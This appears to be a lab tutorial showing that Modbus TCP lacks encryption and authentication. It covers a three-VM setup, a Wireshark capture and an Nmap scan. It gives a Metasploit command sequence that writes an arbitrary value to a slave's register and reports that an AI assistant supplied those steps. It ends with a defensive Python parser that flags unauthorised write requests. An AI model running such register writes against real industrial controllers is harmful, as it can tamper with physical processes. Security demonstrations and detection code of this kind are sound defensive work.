Warning: the purpose of this article is to demonstrate that communications using the Modbus TCP protocol are not secure and therefore, it is advisable to protect communications using other encrypted protocols. Otherwise, we would be putting the security of our systems at risk.
Continuing from the previous article, where we already saw that Modbus TCP is not encrypted and does not require authentication, we will now see how we can exploit those vulnerabilities to write to the registers.
Step 1: Architecture and Modbus Communication in Local Network
For this example, I worked with three virtual machines (VMs):
The three machines are on the same local network, so make sure they can all ping each other and adjust the network adapters so that each one gets its IP address.
Step 2: Configure Modbus Master and Slave
Step 2.1: Configure the Slave
This step is the same as in the previous post: the Modbus slave is configured exactly as before, since it runs on its own server at 127.0.0.1, port 502.
Step 2.2: Configure the Master
However, the Modbus Master that will obtain data from the slave has to do so from outside that PC, so we need to tell it which IP address on the local network our slave is on. In my case it is 192.168.1.50, and the port is the one we already know, 502.
We click Accept and confirm that there is communication when the red "No connection" text disappears.
Step 3: Wireshark - Exploring the Frames
In this case, we select the Ethernet0 network card.
We filter again by "modbus" and select one of the frames, confirming that it carries exactly the same values that the Poll shows.
Step 4: Port Scanning with Nmap and Kali-Linux
We already have our two machines communicating. Now it is time to monitor those communications and explore them to understand the exchange.
- Target machine port scanning: we will perform a port scan from the Kali-Linux machine to our Modbus slave (192.168.1.50), which is our target machine.
We see that it has several open ports, including 502, as expected, with state "open" and service name "mbap".
Step 5: Using Modbus Metasploit Modules with AI Assistance
At this point, we are going to use Metasploit modules, which are tools that exploit vulnerabilities found in different systems.
I am not an expert in the hacking world, but as always, AI is the best ally if you know what you want to do. In this case, it has been very helpful as it provided me with clear and simple steps to execute this attack.
In fact, I sent it an image of the port scan, told it that I had a Kali Linux machine, and asked it to use the existing Metasploit modules to write to the slave's registers. The response was remarkably good and practical. After a few iterations, the result was this code:
sudo msfconsole
use auxiliary/scanner/scada/modbusclient
set RHOSTS 192.168.1.50
set RPORT 502
set UNIT_NUMBER 1
set DATA_ADDRESS 0
set DATA 12345
set ACTION WRITE_REGISTER
run
Run the commands one at a time to check that each one is working correctly:
Result: the specified value is perfectly written in the indicated register.
Conclusions
- Classic Modbus TCP is very vulnerable: it is very easy to intercept the communication and modify values.
- AI is a very powerful tool to help us detect these vulnerabilities and adequately defend ourselves.
Practical case: imagine you have a PLC that controls a device over Modbus and is writing a temperature setpoint. With what we saw today, exploiting the weaknesses of the Modbus TCP protocol, anyone inside the network could easily use these Metasploit modules to change that value and cause problems in the system.
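To make the two points above concrete from the defender's side, here is an added example (my own code, not part of the original article or of any Modbus or Metasploit project). It decodes the same Modbus/TCP frames we looked at in Wireshark in Step 3, showing that the MBAP header and PDU contain no authentication field at all, and then applies the simplest useful detection rule: any write function code (5, 6, 15, 16) arriving from a source IP that is not an authorised master is flagged. The sample traffic is constructed, not captured; 192.168.1.50 is the slave from the article, while 192.168.1.20 (the legitimate master) and 192.168.1.77 (an unknown host) are made-up addresses for this example. The flagged frame is exactly the Write Single Register request the article's module sends: unit 1, address 0, value 12345.

```python
import struct

# Public Modbus function codes. The ones in WRITE_FUNCTION_CODES change the
# slave's state and are the ones a defender wants to watch.
READ_FUNCTION_CODES = {
    1: "Read Coils",
    2: "Read Discrete Inputs",
    3: "Read Holding Registers",
    4: "Read Input Registers",
}
WRITE_FUNCTION_CODES = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
}


def parse_modbus_tcp(frame: bytes) -> dict:
    """Decode one Modbus/TCP request: 7-byte MBAP header followed by the PDU.

    MBAP = transaction id (2) | protocol id (2, always 0) | length (2) | unit id (1).
    'length' counts the unit id plus the whole PDU. There is no field for
    credentials or a signature anywhere in the frame: whoever can reach
    port 502 can send this.
    """
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"unexpected protocol id {pid}")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match the frame size")
    fc = frame[7]
    data = frame[8:]
    info = {
        "transaction_id": tid,
        "unit_id": unit,
        "function_code": fc,
        "name": READ_FUNCTION_CODES.get(fc) or WRITE_FUNCTION_CODES.get(fc, "unknown"),
        "is_write": fc in WRITE_FUNCTION_CODES,
    }
    if fc in (1, 2, 3, 4):            # starting address + quantity
        info["address"], info["quantity"] = struct.unpack(">HH", data[:4])
    elif fc in (5, 6):                # output/register address + value
        info["address"], info["value"] = struct.unpack(">HH", data[:4])
    elif fc == 16:                    # address + quantity + byte count + values
        addr, qty, byte_count = struct.unpack(">HHB", data[:5])
        if byte_count != 2 * qty or len(data) != 5 + byte_count:
            raise ValueError("malformed Write Multiple Registers request")
        info["address"], info["quantity"] = addr, qty
        info["values"] = list(struct.unpack(f">{qty}H", data[5:]))
    return info


def detect_unexpected_writes(records, allowed_masters):
    """Flag every write request whose source IP is not an authorised master.

    records: iterable of (src_ip, dst_ip, frame_bytes), e.g. extracted from a
    pcap. Returns one alert dict per offending frame.
    """
    alerts = []
    for src, dst, frame in records:
        req = parse_modbus_tcp(frame)
        if req["is_write"] and src not in allowed_masters:
            alerts.append({
                "src": src, "dst": dst, "unit_id": req["unit_id"],
                "function": req["name"], "address": req.get("address"),
                "value": req.get("value", req.get("values")),
            })
    return alerts


# Constructed sample traffic (not a real capture). 192.168.1.50 is the slave
# from the article; 192.168.1.20 (legitimate master) and 192.168.1.77
# (unknown host) are made-up addresses for this example.
ALLOWED_MASTERS = {"192.168.1.20"}
SAMPLE_TRAFFIC = [
    # Legitimate poll: Read Holding Registers, address 0, 10 registers
    ("192.168.1.20", "192.168.1.50", bytes.fromhex("0001 0000 0006 01 03 0000 000a")),
    # Unknown host writes 12345 into register 0 (what the article's module does)
    ("192.168.1.77", "192.168.1.50", bytes.fromhex("0002 0000 0006 01 06 0000 3039")),
    # Legitimate master writes two registers starting at address 10
    ("192.168.1.20", "192.168.1.50", bytes.fromhex("0003 0000 000b 01 10 000a 0002 04 0064 00c8")),
]

if __name__ == "__main__":
    for src, dst, frame in SAMPLE_TRAFFIC:
        print(src, "->", dst, parse_modbus_tcp(frame))
    for alert in detect_unexpected_writes(SAMPLE_TRAFFIC, ALLOWED_MASTERS):
        print("ALERT:", alert)
```

Running it prints the three decoded requests and a single alert for the write from 192.168.1.77. The rule is deliberately simple because the protocol gives you nothing better to key on: with no authentication in the frame, the source address and the function code are the only signals available, which is the same reason the article recommends moving such traffic onto an encrypted, authenticated channel instead of relying on detection alone.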